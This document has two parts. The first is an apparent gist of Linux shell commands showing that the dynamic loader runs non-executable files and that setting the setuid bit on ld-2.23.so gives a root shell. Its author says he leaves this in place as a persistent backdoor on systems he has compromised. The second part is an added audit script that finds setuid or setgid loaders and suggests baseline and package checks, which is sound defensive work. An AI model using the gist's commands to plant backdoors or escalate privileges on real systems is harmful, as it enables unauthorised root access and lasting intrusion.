Read implies Execute and Linker/Loader suid abuse.
# First, let's demonstrate that read implies execute.
cp /usr/bin/id .
ls -l ./id
./id
chmod a-x ./id
ls -l id
readelf -l ./id | grep "program interpreter"
ls -l /lib64/ld-linux-x86-64.so.2
ls -l /lib/x86_64-linux-gnu/ld-2.23.so
/lib/x86_64-linux-gnu/ld-2.23.so ./id
# Now what happens if we flip suid bit on the loader?
sudo chmod u+s /lib/x86_64-linux-gnu/ld-2.23.so
ls -l /lib/x86_64-linux-gnu/ld-2.23.so
/lib/x86_64-linux-gnu/ld-2.23.so ./id
# Ok, so our euid is now root. Let's upgrade...
chmod a+x ./id
ls -l ./id
/lib/x86_64-linux-gnu/ld-2.23.so /usr/bin/python -c 'import os; os.setuid(os.geteuid()); os.setgid(os.geteuid()); os.system("./id")'
# The suid bit on the loader is basically a single bit lpe backdoor.
# I use this on systems I've popped so the lpe phase when I return is super quick...
/lib/x86_64-linux-gnu/ld-2.23.so /usr/bin/python -c 'import os; os.setuid(os.geteuid()); os.setgid(os.geteuid()); os.system("/bin/bash")'
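Both halves of the gist rest on the same fact: the dynamic loader will run any ELF it is handed, so the x bit on the target file is not a control, and a setuid/setgid bit on the loader itself hands out its effective uid to every caller. The defender's check is therefore to enumerate privileged files and make sure no loader is among them. The script below is an added example written for this note, not code from the gist; the library directories and the loader filename pattern (ld.so, ld-<ver>.so, ld-linux-*.so.*) are assumptions to adjust for the distribution being audited.

```shell
#!/bin/sh
# Added example (not part of the gist): audit setuid/setgid files under the
# given directories and flag any dynamic loader carrying such a bit.
# A loader should normally be mode 755, owner root; anything else is a
# privilege-escalation backdoor of the kind the gist demonstrates.

# Print "mode owner path" for every regular file under the given roots that
# has the setuid (4000) or setgid (2000) bit set. -H follows roots that are
# themselves symlinks (e.g. /lib -> usr/lib on merged-/usr systems).
list_setuid_files() {
    find -H "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%a %U %n' {} + 2>/dev/null
}

# Print the number of setuid/setgid files whose name looks like a dynamic
# loader (assumed pattern). grep -c prints 0 and exits 1 when nothing
# matches, so "|| true" keeps this usable under set -e.
count_setuid_loaders() {
    list_setuid_files "$@" | grep -cE '/ld(-[^/]*)?\.so' || true
}

# Full report: list every privileged file, then give a verdict on loaders.
# Returns 0 when no loader is setuid/setgid, 1 otherwise.
audit_loaders() {
    echo "== setuid/setgid files under: $*"
    list_setuid_files "$@"
    n=$(count_setuid_loaders "$@")
    if [ "$n" -eq 0 ]; then
        echo "== OK: no dynamic loader has setuid/setgid set"
        return 0
    fi
    echo "== ALERT: $n dynamic loader(s) with setuid/setgid set (expected 755 root):"
    list_setuid_files "$@" | grep -E '/ld(-[^/]*)?\.so'
    return 1
}

# Typical invocation: ./audit_loaders.sh /lib /lib64 /usr/lib /usr/lib64
if [ $# -gt 0 ]; then
    audit_loaders "$@"
else
    echo "usage: $0 LIBDIR..." >&2
fi
```

Run it from cron or a configuration-management check and compare the `list_setuid_files` output against a stored baseline; a new entry anywhere, loader or not, deserves a look, and a non-zero exit from `audit_loaders` should page someone. Package verification (for example `dpkg --verify` or `rpm -V` on the libc package) is a useful second opinion, since it compares the loader's recorded mode with the on-disk one.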